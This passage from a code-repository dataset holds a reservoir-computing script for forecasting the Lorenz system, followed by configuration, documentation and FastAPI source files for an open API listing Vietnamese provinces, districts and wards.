k4y = fy(xarr[i] + h*k3x, yarr[i] + h*k3y, 
zarr[i] + h*k3z)\n k4z = fz(xarr[i] + h*k3x, yarr[i] + h*k3y, zarr[i] + h*k3z)\n \n xarr = np.append(xarr, (xarr[i] + 1/6*h*(k1x + 2*k2x + 2*k3x + k4x)))\n yarr = np.append(yarr, (yarr[i] + 1/6*h*(k1y + 2*k2y + 2*k3y + k4y)))\n zarr = np.append(zarr, (zarr[i] + 1/6*h*(k1z + 2*k2z + 2*k3z + k4z)))\n \n \n return np.stack([xarr,yarr,zarr])\n\n#u = rungekutta(1,1,1)\n\n#time = np.array(range(0,2201))\n\n#plt.plot(time, u[0])\n\n#u_longterm = u[:,200:]\n#time = np.array(range(0, u_longterm[0].size))\n#plt.plot(u_longterm[2], u_longterm[0])\n\n#u_sample = u[:, 0::10]\n#print(u_sample.shape)\n#time = np.array(range(0, u_sample[0].size))\n#plt.plot(time, u_sample[0])\n\n" }, { "alpha_fraction": 0.5358785390853882, "alphanum_fraction": 0.5802667737007141, "avg_line_length": 37.469024658203125, "blob_id": "e4d51b9edfdcdb1f5414355fda46e54d9724116e", "content_id": "dc31513ae096a348c3cc20e74834eb9417554acb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8696, "license_type": "no_license", "max_line_length": 202, "num_lines": 226, "path": "/lorenz_reservoir_6in6out.py", "repo_name": "majorminus66/trend_2020", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 12:57:49 2020\n\n@author: josephharvey\n\"\"\"\n\nfrom lorenzrungekutta import rungekutta\nimport numpy as np\n#from sklearn.linear_model import Ridge\nfrom scipy import sparse\nfrom scipy.linalg import solve\nfrom scipy.sparse.linalg import eigs\nfrom matplotlib import pyplot as plt\n\nnp.random.seed()\n\n#why is lorenz signal passing 0?\n\n#50 seems to be unstable boundary\nclass Reservoir:\n def __init__(self, rk, rsvr_size = 300, spectral_radius = 0.6, input_weight = 1):\n self.rsvr_size = rsvr_size\n \n #get spectral radius < 1\n #gets row density = 0.03333\n unnormalized_W = (np.random.rand(rsvr_size,rsvr_size)*2 - 1)\n for i in range(unnormalized_W[:,0].size):\n for j in range(unnormalized_W[0].size):\n if np.random.rand(1) > 10/rsvr_size:\n unnormalized_W[i][j] = 0\n \n max_eig = eigs(unnormalized_W, k = 1, return_eigenvectors = False)\n \n self.W = sparse.csr_matrix(spectral_radius/np.abs(max_eig)*unnormalized_W)\n \n const_conn = int(rsvr_size*0.1)\n signal_conn = int((rsvr_size-const_conn)/6)\n \n \n Win = np.zeros((rsvr_size, 7))\n #constant\n Win[:const_conn, 0] = (np.random.rand(Win[:const_conn, 0].size)*2 - 1)*input_weight\n #x\n Win[const_conn: const_conn + signal_conn, 1] = (np.random.rand(Win[const_conn: const_conn + signal_conn, 1].size)*2 - 1)*input_weight\n #y\n Win[const_conn + signal_conn:const_conn + 2*signal_conn, 2] = (np.random.rand(Win[const_conn + signal_conn:const_conn + 2*signal_conn, 2].size)*2 - 1)*input_weight\n #z\n Win[const_conn + 2*signal_conn: const_conn + 3*signal_conn, 3] = (np.random.rand(Win[const_conn + 2*signal_conn: const_conn + 3*signal_conn, 3].size)*2 - 1)*input_weight\n #x^2\n Win[const_conn + 3*signal_conn:const_conn + 4*signal_conn, 4] = (np.random.rand(Win[const_conn + 3*signal_conn:const_conn + 4*signal_conn, 4].size)*2 - 1)*input_weight\n #y^2\n Win[const_conn + 4*signal_conn:const_conn + 5*signal_conn, 5] = (np.random.rand(Win[const_conn + 4*signal_conn:const_conn + 5*signal_conn, 5].size)*2 - 1)*input_weight\n #z^2\n Win[const_conn + 5*signal_conn:, 6] = (np.random.rand(Win[const_conn + 5*signal_conn:, 6].size)*2 - 1)*input_weight\n \n \n self.Win = sparse.csr_matrix(Win)\n self.X = (np.random.rand(rsvr_size, rk.train_length+2)*2 - 1)\n self.Wout = np.array([])\n \nclass 
RungeKutta:\n def __init__(self, x0 = 2,y0 = 2,z0 = 23, h = 0.01, T = 300, ttsplit = 5000, noise_scaling = 0):\n u_arr = rungekutta(x0,y0,z0,h,T)[:, ::5]\n self.train_length = ttsplit\n \n u_arr[0] = (u_arr[0] - 0)/7.929788629895004\n u_arr[1] = (u_arr[1] - 0)/8.9932616136662\n u_arr[2] = (u_arr[2] - 23.596294463016896)/8.575917849311919\n \n self.u_arr_train = u_arr[:, :ttsplit+1]\n #size 5001\n \n #noisy training array\n #switch to gaussian \n noise = np.random.randn(self.u_arr_train[:,0].size, self.u_arr_train[0,:].size)*noise_scaling \n self.u_arr_train_noise = self.u_arr_train + noise\n \n #plt.plot(self.u_arr_train_noise[0, :500])\n \n #u[5000], the 5001st element, is the last in u_arr_train and the first in u_arr_test\n self.u_arr_test = u_arr[:, ttsplit:]\n #size 1001\n \n#takes a reservoir object res along with initial conditions\ndef getX(res, rk,x0 = 1,y0 = 1,z0 = 1, noise = False):\n \n if noise:\n u_training = rk.u_arr_train_noise\n else:\n u_training = rk.u_arr_train\n \n #loops through every timestep\n for i in range(0, u_training[0].size):\n u = np.concatenate((np.array([1]), u_training[:,i], transform(u_training[:,i]))).reshape(7,1)\n \n x = res.X[:,i].reshape(res.rsvr_size,1)\n x_update = np.tanh(np.add(res.Win.dot(u), res.W.dot(x)))\n \n res.X[:,i+1] = x_update.reshape(1,res.rsvr_size) \n \n return res.X\n \ndef trainRRM(res, rk):\n print(\"Training... \")\n\n alph = 10**-4\n #rrm = Ridge(alpha = alph, solver = 'cholesky')\n \n #train on 10 small training sets with different noise - minimize error over all\n #save the state of the reservoir for noisy datasets\n #also try - train on signal^2 or other function (get more info than just 3 vars) - no noise\n \n Y_train = np.concatenate((rk.u_arr_train[:, 301:], transform(rk.u_arr_train[:, 301:])), axis = 0)\n \n X = getX(res, rk, noise = True)[:, 301:(res.X[0].size - 1)]\n X_train = np.concatenate((np.ones((1, rk.u_arr_train[0].size-301)), X, rk.u_arr_train[:, 300:(rk.u_arr_train[0].size - 1)], transform(rk.u_arr_train[:, 300:(rk.u_arr_train[0].size - 1)])), axis = 0)\n #X_train = np.copy(X)\n \n idenmat = np.identity(res.rsvr_size+7)*alph\n data_trstates = np.matmul(Y_train, np.transpose(X_train))\n states_trstates = np.matmul(X_train,np.transpose(X_train))\n res.Wout = np.transpose(solve(np.transpose(states_trstates + idenmat),np.transpose(data_trstates)))\n \n print(\"Training complete \")\n #Y_train = Y_train.transpose()\n #X_train = X.transpose()\n \n #tweak regression param? 
use 10^-4, 10^-6\n #test Ridge() in simpler context\n #rrm.fit(X_train,Y_train)\n #res.Wout = rrm.coef_\n return\n \ndef predict(res, x0 = 0, y0 = 0, z0 = 0, steps = 1000):\n Y = np.empty((6, steps + 1))\n X = np.empty((res.rsvr_size, steps + 1))\n \n Y[:3,0] = np.array([x0,y0,z0]).reshape(1,3)\n Y[3:,0] = transform(np.array([x0,y0,z0]).reshape(1,3))\n X[:,0] = res.X[:,-2]\n\n \n for i in range(0, steps):\n y_in = np.concatenate((np.array([1]), Y[:,i]), axis = 0).reshape(7,1) \n x_prev = X[:,i].reshape(res.rsvr_size,1)\n \n x_current = np.tanh(np.add(res.Win.dot(y_in), res.W.dot(x_prev)))\n X[:,i+1] = x_current.reshape(1,res.rsvr_size)\n #X = np.concatenate((X, x_current), axis = 1)\n \n y_out = np.matmul(res.Wout, np.concatenate((np.array([[1]]), x_current, Y[:,i].reshape(6,1)), axis = 0))\n #y_out = np.matmul(res.Wout, x_current)\n Y[:,i+1] = y_out.reshape(1, 6) \n \n\n return Y\n\ndef test(res, num_tests = 10, rkTime = 200, split = 2000, showPlots = True):\n valid_time = np.array([])\n means = np.zeros(num_tests)\n variances = np.zeros(num_tests)\n \n for i in range(num_tests):\n ic = np.random.rand(3)*2-1\n rktest = RungeKutta(x0 = ic[0], y0 = ic[1], z0 = 30*ic[2], T = rkTime, ttsplit = split)\n res.X = (np.zeros((res.rsvr_size, split+2))*2 - 1)\n \n #sets res.X\n getX(res, rktest)\n \n pred = predict(res, x0 = rktest.u_arr_test[0,0], y0 = rktest.u_arr_test[1,0], z0 = rktest.u_arr_test[2,0], steps = (rkTime*20-split))\n \n for j in range(0, pred[0].size):\n if np.abs(pred[0, j] - rktest.u_arr_test[0, j]) > 1.5:\n valid_time = np.append(valid_time, j)\n print(\"Test \" + str(i) + \" valid time: \" + str(j))\n break\n \n print(\"Mean: \" + str(np.mean(pred[0])))\n print(\"Variance: \" + str(np.var(pred[0])))\n \n means[i] = np.mean(pred[0])\n variances[i] = np.var(pred[0])\n \n if showPlots:\n plt.figure()\n plt.plot(pred[0])\n plt.plot(rktest.u_arr_test[0])\n \n if showPlots:\n plt.show()\n \n print(\"Avg. valid time steps: \" + str(np.mean(valid_time)))\n print(\"Std. valid time steps: \" + str(np.std(valid_time)))\n print(\"Avg. of x dim: \" + str(np.mean(means)))\n print(\"Var. of x dim: \" + str(np.mean(variances)))\n return np.mean(valid_time)\n\ndef transform(x):\n return np.tanh(x)*0.0001 \n\n#fidelity metric\n#valid time - consider three inputs and 6 inputs\n#try at a few res. sizes\n\n#stability criterion, comparing no noise, 3 inputs, 6 inputs, noise: \n#eyeball test\n#mean and variance of all datapoints\n#intervals between sign changes \n#compute correlation function \n\ntrain_time = 300 \nrk = RungeKutta(T = train_time, ttsplit = train_time*20, noise_scaling = 0.000) #ttsplit = train_time*20\n\nresults = np.array([])\nnum_res = 10\nfor i in range (num_res):\n print(\"Reservoir \" + str(i+1) + \" of \" + str(num_res))\n res = Reservoir(rk, rsvr_size = 50, spectral_radius = 0.5, input_weight = 1)\n trainRRM(res, rk) \n results = np.append(results, test(res, 5, rkTime = 200, showPlots = True))\n print(results.size)\nprint(\"Average valid time for \" + str(num_res) + \" reservoirs at \" + str(train_time) + \": \" + str(np.mean(results)))\nprint(results) \n\n" } ]
5
ngoc-tuyen/vn-open-api-provinces
https://github.com/ngoc-tuyen/vn-open-api-provinces
bd1ff6d8534c1a77f21a9e0305eed1d81c60455e
44234c728ce8ac92f29071ba17018dcd874f7c43
04f3581194896f4653dc71a9de2f88772e9e4fb4
refs/heads/main
2023-08-01T17:59:13.700333
2021-09-26T09:08:47
2021-09-26T09:08:47
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5142428874969482, "alphanum_fraction": 0.6116941571235657, "avg_line_length": 21.233333587646484, "blob_id": "a3389b947578cfc62c88173caf69031fb31e3ce3", "content_id": "f08819a28674b4717a9b95bd5c547c97c9428eae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 667, "license_type": "no_license", "max_line_length": 70, "num_lines": 30, "path": "/pyproject.toml", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"vn-open-api-provinces\"\nversion = \"0.2.0\"\ndescription = \"\"\nauthors = [\"Nguyễn Hồng Quân <[email protected]>\"]\nlicense = \"GPL-3.0-or-later\"\n\n[tool.poetry.dependencies]\npython = \"^3.6.1\"\nfastapi = \"^0.66.0\"\npydantic = \"^1.8.2\"\nLogbook = \"^1.5.3\"\nvietnam-provinces = \"^0.4.2\"\nuvicorn = \"^0.14.0\"\ndataclasses = { version = \"^0.8\", markers = \"python_version < '3.7'\" }\nfastapi-rfc7807 = \"^0.5.0\"\naiofiles = \"^0.7.0\"\nlunr = \"^0.6.0\"\nUnidecode = \"^1.2.0\"\nsingle-version = \"^1.5.1\"\n\n[tool.poetry.dev-dependencies]\npytest = \"^5.2\"\ndoc8 = \"^0.8.1\"\nflake8 = \"^3.9.2\"\nwheel = \"^0.37.0\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n" }, { "alpha_fraction": 0.5118279457092285, "alphanum_fraction": 0.5591397881507874, "avg_line_length": 24.83333396911621, "blob_id": "567096f52024862aa99ba491ceb6754afb65bb86", "content_id": "22a2508e16c46d4dc7c1207904681291389c1c98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JSON", "length_bytes": 465, "license_type": "no_license", "max_line_length": 107, "num_lines": 18, "path": "/front-dev/package.json", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "{\n \"name\": \"front\",\n \"version\": \"1.0.0\",\n \"main\": \"index.js\",\n \"license\": \"MIT\",\n \"private\": true,\n \"scripts\": {\n \"build-tailwind\": \"NODE_ENV=production npx tailwindcss build -o ../static/vendor/tailwind.css --minify\"\n },\n \"devDependencies\": {\n \"@tailwindcss/aspect-ratio\": \"^0.2.1\",\n \"@tailwindcss/forms\": \"^0.3.3\",\n \"@tailwindcss/typography\": \"^0.4.1\",\n \"autoprefixer\": \"^10.3.0\",\n \"cssnano\": \"^5.0.6\",\n \"tailwindcss\": \"^2.2.4\"\n }\n}\n" }, { "alpha_fraction": 0.5493670701980591, "alphanum_fraction": 0.65139240026474, "avg_line_length": 95.34146118164062, "blob_id": "f679f270d2b45816a773b5ebf1e1fca6f8348120", "content_id": "b707f1f0072125aec445827041e4ff0bdb88addd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 3950, "license_type": "no_license", "max_line_length": 658, "num_lines": 41, "path": "/requirements.txt", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "aiofiles==0.7.0; python_version >= \"3.6\" and python_version < \"4.0\"\nasgiref==3.4.1; python_version >= \"3.6\"\natomicwrites==1.4.0; python_version >= \"3.5\" and python_full_version < \"3.0.0\" and sys_platform == \"win32\" or sys_platform == \"win32\" and python_version >= \"3.5\" and python_full_version >= \"3.4.0\"\nattrs==21.2.0; python_version >= \"3.5\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\" and python_version >= \"3.5\"\nchardet==4.0.0; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\nclick==8.0.1; python_version >= \"3.6\"\ncolorama==0.4.4; python_version >= \"3.6\" and python_full_version < 
\"3.0.0\" and sys_platform == \"win32\" and platform_system == \"Windows\" or sys_platform == \"win32\" and python_version >= \"3.6\" and python_full_version >= \"3.5.0\" and platform_system == \"Windows\"\ndataclasses==0.8; python_version >= \"3.6\" and python_version < \"3.7\" and python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\" or python_version < \"3.7\"\ndoc8==0.8.1\ndocutils==0.17.1; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\nfast-enum==1.3.0; python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\"\nfastapi-rfc7807==0.5.0; python_version >= \"3.6\"\nfastapi==0.66.1; python_version >= \"3.6\"\nflake8==3.9.2; (python_version >= \"2.7\" and python_full_version < \"3.0.0\") or (python_full_version >= \"3.5.0\")\nh11==0.12.0; python_version >= \"3.6\"\nimportlib-metadata==2.1.1; python_version >= \"3.6\" and python_version < \"3.8\" and python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\" and (python_version >= \"3.5\" and python_full_version < \"3.0.0\" and python_version < \"3.8\" or python_version < \"3.8\" and python_version >= \"3.5\" and python_full_version >= \"3.5.0\") and (python_version >= \"2.7\" and python_full_version < \"3.0.0\" and python_version < \"3.8\" or python_full_version >= \"3.5.0\" and python_version < \"3.8\") and (python_version >= \"3.6\" and python_full_version < \"3.0.0\" and python_version < \"3.8\" or python_version < \"3.8\" and python_version >= \"3.6\" and python_full_version >= \"3.5.0\")\nlogbook==1.5.3\nlunr==0.6.0; python_version >= \"3.6\"\nmccabe==0.6.1; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\nmore-itertools==8.8.0; python_version >= \"3.5\"\npackaging==21.0; python_version >= \"3.6\"\npbr==5.6.0; python_version >= \"3.6\"\npluggy==0.13.1; python_version >= \"3.5\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.4.0\" and python_version >= \"3.5\"\npy==1.10.0; python_version >= \"3.5\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.4.0\" and python_version >= \"3.5\"\npycodestyle==2.7.0; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\npydantic==1.8.2; python_full_version >= \"3.6.1\"\npyflakes==2.3.1; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\npygments==2.9.0; python_version >= \"3.5\"\npyparsing==2.4.7; python_version >= \"3.6\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.3.0\" and python_version >= \"3.6\"\npytest==5.4.3; python_version >= \"3.5\"\nrestructuredtext-lint==1.3.2\nsingle-version==1.5.1; python_version >= \"3.6\" and python_version < \"4.0\"\nsix==1.16.0; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.3.0\"\nstarlette==0.14.2; python_version >= \"3.6\"\nstevedore==3.3.0; python_version >= \"3.6\"\ntyping-extensions==3.10.0.0; python_full_version >= \"3.6.1\" and python_version >= \"3.6\" and python_version < \"3.8\"\nunidecode==1.2.0; (python_version >= \"2.7\" and python_full_version < \"3.0.0\") or (python_full_version >= \"3.4.0\")\nuvicorn==0.14.0\nvietnam-provinces==0.4.2; python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\"\nwcwidth==0.2.5; python_version >= \"3.5\"\nzipp==3.5.0; python_version >= \"3.6\" and python_version < \"3.8\" and python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\"\n" }, { "alpha_fraction": 
0.6486486196517944, "alphanum_fraction": 0.6486486196517944, "avg_line_length": 17.5, "blob_id": "d99cf2ed767667f18f82acb4d79bef3b59aace9b", "content_id": "70a9344867a7cb3262cd9cbd5002d3d2f24425cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 74, "license_type": "no_license", "max_line_length": 38, "num_lines": 4, "path": "/content/examples/index.md", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "+++\ntitle = \"Province Open API - Examples\"\ntemplate = \"examples.html\"\n+++\n" }, { "alpha_fraction": 0.5603161454200745, "alphanum_fraction": 0.5661397576332092, "avg_line_length": 21.467288970947266, "blob_id": "9536c9fe2314785be5396bfe514ac7164937ffd9", "content_id": "28238d177e3d92d4e046d18b9300b993eb177f3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2416, "license_type": "no_license", "max_line_length": 108, "num_lines": 107, "path": "/api/schema.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "from enum import Enum\nfrom typing import List, Dict, Tuple\n\nfrom pydantic import BaseModel, Field\n\nfrom vietnam_provinces.base import VietNamDivisionType\n\n\n# The code here looks like a duplicate of vietnam_provinces.base, but unfortunately, we cannot subclass from\n# vietnam_provinces.base's dataclasses, because:\n# - Ward is frozen (fastenum's restriction), it cannot be subclass\n# - FastAPI haven't supported dataclasses\n\n\nclass DivisionLevel(str, Enum):\n P = 'province'\n D = 'district'\n W = 'ward'\n\n\n_EXAMPLE_WARD = {\n 'name': 'Phường Phúc Xá',\n 'code': 1,\n 'division_type': 'phường',\n 'codename': 'phuong_phuc_xa',\n 'district_code': 1\n}\n\n\nclass Ward(BaseModel):\n name: str\n code: int\n division_type: VietNamDivisionType\n codename: str\n district_code: int\n\n class Config:\n schema_extra = {\n 'example': _EXAMPLE_WARD\n }\n\n\n_EXAMPLE_DISTRICT = {\n 'name': 'Quận Ba Đình',\n 'code': 1,\n 'division_type': 'quận',\n 'codename': 'quan_ba_dinh',\n 'province_code': 1,\n 'wards': [_EXAMPLE_WARD]\n}\n\n\nclass District(BaseModel):\n name: str\n code: int\n division_type: VietNamDivisionType\n codename: str\n province_code: int\n wards: List[Ward] = Field(default=[])\n\n class Config:\n schema_extra = {\n 'example': _EXAMPLE_DISTRICT\n }\n\n\n_EXAMPLE_PROVINCE = {\n 'name': 'Thành phố Hà Nội',\n 'code': 1,\n 'division_type': 'thành phố trung ương',\n 'codename': 'thanh_pho_ha_noi',\n 'phone_code': 24,\n 'districts': [_EXAMPLE_DISTRICT]\n}\n\n\nclass ProvinceResponse(BaseModel):\n name: str\n code: int\n division_type: VietNamDivisionType\n codename: str\n phone_code: int\n districts: List[District] = Field(default=[])\n\n class Config:\n schema_extra = {\n 'example': _EXAMPLE_PROVINCE\n }\n\n\nclass SearchResult(BaseModel):\n name: str\n code: int\n matches: Dict[str, Tuple[int, int]] = Field({}, title='Matched words and their positions in name.',\n description='This info can help client side highlight '\n 'the result in display.')\n\n class Config:\n schema_extra = {\n 'example': {\n 'name': 'Thị xã Phú Mỹ',\n 'code': 754,\n 'matches': {\n 'mỹ': [11, 13]\n },\n }\n }\n" }, { "alpha_fraction": 0.7155745625495911, "alphanum_fraction": 0.7155745625495911, "avg_line_length": 30.909090042114258, "blob_id": "2db0caacd54eca7950ef85beb6b83b0bfd56e888", "content_id": "a96fa8aeeb7ef42ea017424fdb3a88f235f3fa2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "reStructuredText", "length_bytes": 2106, "license_type": "no_license", "max_line_length": 212, "num_lines": 66, "path": "/README.rst", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "=====================\nViet Nam province API\n=====================\n\nHomepage: https://provinces.open-api.vn\n\nThis is online tool to let my VietnamProvinces_ library reach more users. VietnamProvinces_ is a Python library, so it can only be used in Python application.\nBy building an online tool on top of it, I hope to help Viet Nam standard data reach more application developers, easpecially web frontend application, where inclusion of big JSON file is not an optimized option.\nIn the end, it can help businesses collaborate better (by using the same standard data) and benefit people.\n\n\nThe online tool is built to run on Vercel_ platform, so that I don't have to pay for infrastructure, because this tool is FREE to use.\n\n\nDevelopment guide\n-----------------\n\nIf you want to join development, this is what you want to know:\n\nThe code consists of two parts:\n\n- Landing page: A static HTML page, built with Zola_. CSS is based on TailwindCSS_.\n- API backend: Written in Python_, based on FastAPI_ framework.\n\nAssume that you already install all dependencies.\n\n- To build landing page, run at the top-level folder:\n\n .. code-block:: sh\n\n zola build\n\n- To run the backend, run at the top-level folder:\n\n .. code-block:: sh\n\n uvicorn api.main:app\n\n- To serve the landing page and run the API backend at the same time, you can run this at the top-level folder:\n\n .. code-block:: sh\n\n npx vercel dev\n\n- If you modify HTML code in landing, chance that you are adding new CSS classes and you don't see update.\n It is because we configure TailwindCSS to delete all unused CSS classes. You need to build TailwindCSS again, let it scan used classes again.\n Doing so by running this command in *front-dev*:\n\n .. code-block:: sh\n\n yarn build-tailwind\n\n\nCredit\n------\n\nBrought to you by `Nguyễn Hồng Quân <author_>`_.\n\n\n.. _vercel: https://vercel.com\n.. _zola: https://www.getzola.org/\n.. _tailwindcss: https://tailwindcss.com/\n.. _python: https://www.python.org/\n.. _fastapi: https://fastapi.tiangolo.com/\n.. _author: https://quan.hoabinh.vn\n.. 
_VietnamProvinces: https://pypi.org/project/vietnam-provinces/\n" }, { "alpha_fraction": 0.4016145169734955, "alphanum_fraction": 0.41775983572006226, "avg_line_length": 19.64583396911621, "blob_id": "9678bd382a63c302b876579ff8f1700581c6bb10", "content_id": "786b18fd3f979471837fe2f696ea653605559187", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 991, "license_type": "no_license", "max_line_length": 44, "num_lines": 48, "path": "/front-dev/tailwind.config.js", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "const colors = require('tailwindcss/colors')\n\nmodule.exports = {\n purge: [\n '../templates/*.html',\n ],\n darkMode: false, // or 'media' or 'class'\n theme: {\n colors: {\n transparent: 'transparent',\n current: 'currentColor',\n ...colors,\n },\n extend: {\n typography: {\n DEFAULT: {\n css: {\n p: {\n marginTop: '0.75em',\n marginBottom: '0.75em',\n },\n pre: {\n marginTop: '1em',\n marginBottom: '1em',\n lineHeight: 1.5,\n fontSize: '0.75em',\n },\n img: {\n marginTop: '1em',\n marginBottom: '1em',\n },\n h2: {\n fontWeight: 'inherit'\n },\n }\n }\n }\n },\n },\n variants: {\n extend: {},\n },\n plugins: [\n require('@tailwindcss/forms'),\n require('@tailwindcss/aspect-ratio'),\n require('@tailwindcss/typography'),\n ],\n}\n" }, { "alpha_fraction": 0.4801200330257416, "alphanum_fraction": 0.5033758282661438, "avg_line_length": 13.811111450195312, "blob_id": "5f766752369bbf0040aec723182a34fdd8028a33", "content_id": "bace3c402ead3998b4443f8ee523a085398ff8dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1353, "license_type": "no_license", "max_line_length": 56, "num_lines": 90, "path": "/content/_index.md", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "+++\ntitle = \"Province Open API\"\ntemplate = \"index.html\"\n+++\n\nVí dụ với [HTTPie](https://httpie.io/):\n\n#### Liệt kê:\n\n```sh\nhttp -v https://provinces.open-api.vn/api/ depth==2\n```\n\nRequest:\n\n```http\nGET /api/?depth=2 HTTP/1.1\nHost: provinces.open-api.vn\n```\n\nResponse:\n\n```http\nHTTP/1.1 200 OK\nConnection: keep-alive\nContent-Type: application/json\nTransfer-Encoding: chunked\n\n[\n {\n \"name\": \"Thành phố Hà Nội\",\n \"code\": 1,\n \"division_type\": \"thành phố trung ương\",\n \"phone_code\": 24,\n \"codename\": \"thanh_pho_ha_noi\",\n \"districts\": [\n {\n \"name\": \"Quận Ba Đình\",\n \"code\": 1,\n \"codename\": \"quan_ba_dinh\",\n \"division_type\": \"quận\",\n \"province_code\": 1,\n \"wards\": null\n },\n {\n \"name\": \"Quận Hoàn Kiếm\",\n \"code\": 2,\n \"codename\": \"quan_hoan_kiem\",\n \"division_type\": \"quận\",\n \"province_code\": 1,\n \"wards\": null\n },\n ...\n ]\n },\n ...\n]\n```\n\n#### Tìm kiếm:\n\n```sh\nhttp -v https://provinces.open-api.vn/api/d/search/ q==Y\n```\n\nRequest:\n\n```http\nGET /api/d/search/?q=Y HTTP/1.1\nHost: provinces.open-api.vn\n```\n\nResponse:\n\n```http\nHTTP/1.1 200 OK\nContent-Type: application/json\ncontent-length: 71\n\n[\n {\n \"name\": \"Huyện Ý Yên\",\n \"code\": 360,\n \"matches\": {\n \"y\": [6, 7]\n },\n \"score\": 6\n }\n]\n```\n" }, { "alpha_fraction": 0.6557350158691406, "alphanum_fraction": 0.6627508401870728, "avg_line_length": 36.601226806640625, "blob_id": "992f256cf2cdc7125153fbbb2579630dd43237d7", "content_id": "9173aa9284d1491bad4d6aea04408bf07f17ad26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 6129, "license_type": "no_license", "max_line_length": 118, "num_lines": 163, "path": "/api/main.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "from dataclasses import asdict\nfrom itertools import groupby\nfrom operator import attrgetter\nfrom collections import deque\nfrom typing import List, FrozenSet, Dict, Any, Optional\n\nfrom logbook import Logger\nfrom logbook.more import ColorizedStderrHandler\nfrom fastapi import FastAPI, APIRouter, Query, HTTPException, Request\nfrom fastapi.responses import FileResponse\nfrom pydantic import BaseSettings\nfrom fastapi_rfc7807 import middleware\nfrom lunr.exceptions import QueryParseError\n\nfrom vietnam_provinces import NESTED_DIVISIONS_JSON_PATH\nfrom vietnam_provinces.enums import ProvinceEnum, DistrictEnum\nfrom vietnam_provinces.enums.wards import WardEnum\n\nfrom . import __version__\nfrom .schema import ProvinceResponse, District as DistrictResponse, Ward as WardResponse, SearchResult\nfrom .search import Searcher\n\n\nclass Settings(BaseSettings):\n tracking: bool = False\n cdn_cache_interval: int = 30\n\n\nlogger = Logger(__name__)\napp = FastAPI(title='Vietnam Provinces online API', version=__version__)\napi = APIRouter()\nsettings = Settings()\nmiddleware.register(app)\nrepo = Searcher()\nColorizedStderrHandler().push_application()\n\n\nSearchResults = List[SearchResult]\nSearchQuery = Query(..., title='Query string for search', example='Hiền Hòa',\n description='Follow [lunr](https://lunr.readthedocs.io/en/latest/usage.html#using-query-strings)'\n ' syntax.')\n\n\[email protected]('/', response_model=List[ProvinceResponse])\nasync def show_all_divisions(depth: int = Query(1, ge=1, le=3,\n title='Show down to subdivisions',\n description='2: show districts; 3: show wards')):\n if depth >= 3:\n return FileResponse(NESTED_DIVISIONS_JSON_PATH)\n if depth == 2:\n provinces = deque()\n for k, group in groupby(DistrictEnum, key=attrgetter('value.province_code')):\n p = asdict(ProvinceEnum[f'P_{k}'].value)\n p['districts'] = tuple(asdict(d.value) for d in group)\n provinces.append(p)\n return provinces\n return tuple(asdict(p.value) for p in ProvinceEnum)\n\n\[email protected]('/p/', response_model=List[ProvinceResponse])\nasync def list_provinces():\n return tuple(asdict(p.value) for p in ProvinceEnum)\n\n\[email protected]('/p/search/', response_model=SearchResults)\nasync def search_provinces(q: str = SearchQuery):\n try:\n res = repo.search_province(q)\n return res\n except QueryParseError:\n raise HTTPException(status_code=422, detail='unrecognized-search-query')\n\n\[email protected]('/p/{code}', response_model=ProvinceResponse)\nasync def get_province(code: int,\n depth: int = Query(1, ge=1, le=3, title='Show down to subdivisions',\n description='2: show districts; 3: show wards')):\n try:\n province = ProvinceEnum[f'P_{code}'].value\n except (KeyError, AttributeError):\n raise HTTPException(404, detail='invalid-province-code')\n response = asdict(province)\n districts = {}\n if depth >= 2:\n districts: Dict[int, Dict[str, Any]] = {d.value.code: asdict(d.value)\n for d in DistrictEnum if d.value.province_code == code}\n if depth == 3:\n district_codes: FrozenSet[int] = frozenset(districts.keys())\n for k, group in groupby(WardEnum, key=attrgetter('value.district_code')):\n if k not in 